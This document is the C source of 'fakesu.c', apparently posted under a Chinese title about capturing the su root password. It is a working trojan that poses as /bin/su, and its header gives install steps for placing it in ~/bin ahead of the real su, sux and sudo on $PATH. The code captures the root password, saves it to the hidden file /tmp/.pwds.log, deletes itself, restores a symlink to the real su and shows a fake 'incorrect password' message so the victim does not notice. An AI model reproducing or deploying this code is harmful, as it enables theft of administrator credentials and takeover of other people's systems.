记录su root帐号

#include <stdio.h>
 #include <unistd.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys/types.h>
 #include <sys/stat.h>

 /*

    [ fakesu.c ] 2oo6 by OOZIE <oozie[at]poczta.fm>
    ~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   
    Simple /bin/su fake-proggy. Very useful if you have a shell
    with regular user rights, who uses from time to time su/sux/sudo
    to become a superuser.
   
    INSTALL
    ~~~~~~~
    If you can find ~/bin directories (e.g. SUSE Linux 10.1) which are
    located at the beginning of $PATH variable (EXTREMELY BAD IDEA!)
    in this case nothing simpler as:
   
    gcc fakesu.c -o ~/bin/su
    ln -s ~/bin/su ~/bin/sux     # just to be sure
    ln -s ~/bin/su ~/bin/sudo    # Carefully! sudo & su passwd propt differs!
                                   sudo: "Password:"
                     su: "Password: "
                                                   ^
    In any other case you have to create such a directory on your own
    and modify $PATH variable appropriately.
   
 */

 #define LOG "/tmp/.pwds.log"  // change to hide stolen password somwhere else
 #define SU "/bin/su"          // location of su can vary depending on a system

 #ifdef CRYPTO          // ---[ OPTIONAL ENCRYPTION OF STOLEN PASSWORD ]---
 #define CRYPT0 1       //    If compiled with -DCRYPTO, then CRYPT0=1
 #endif                 //    -> stored password will be encrypted
 #ifndef CRYPTO         //
 #define CRYPT0 0       //    in any other case CRYPT0=0, plaintext (default)
 #endif

 /*

 // This is not the part of this program, just a simple demo
 // how the decryption algorithm for this proggie looks like.
 // Copy & paste if needed

 char *decrypt(char *string2) {
    int i;

    for(i=0;i < strlen(string2);i+=2)
       string2[i]--;
    for(i=1;i < strlen(string2);i+=2)
       string2[i]++;
   
    return string2;
   
 }
 */

 char *encrypt(char *string) {

    int i;

    for(i=0;i < strlen(string);i+=2)
       string[i]++;
    for(i=1;i < strlen(string);i+=2)
       string[i]--;
   
    return string;
 }

 int main(int argc, char **argv) {
    char passwd[256];
    char *path, *newpath, *token, *fullpath;
    struct stat *buf;
    FILE *pwdfile;
    int fd, lock=0;
   
    path=(char *)malloc(1024);
    newpath=(char *)malloc(1024);
    fullpath=(char *)malloc(256);  

    path=getenv("PATH");
    token=strtok(path,":");
   
    do {

       if (lock==0) {        // REMOVE binary su only by the first time
      
          strcpy(fullpath,token);
          strcat(fullpath,"/");       //
          strcat(fullpath,argv[0]);
      
          if (!(remove(fullpath))) {
         strcpy(newpath,fullpath);
         lock=1;
          }
     
       }

      
    } while (token=strtok(NULL, ":"));
   
                                // Very important - symbolic link must be made
    symlink(SU,newpath); // binary is gone. after the original Otherwise,
    // the victim executing su once again can see the full path to non-existent
    // trojan followed by an error message - we don't want that!
   
    strncpy(passwd,getpass("Password: "),256);
    pwdfile=fopen(LOG, "w");
     if (CRYPT0) encrypt(passwd);
     fprintf(pwdfile, "%s\n",passwd);
    fclose(pwdfile);

    sleep(3);
    printf("%s: incorrect password\n", argv[0]);
    return 0;  
 }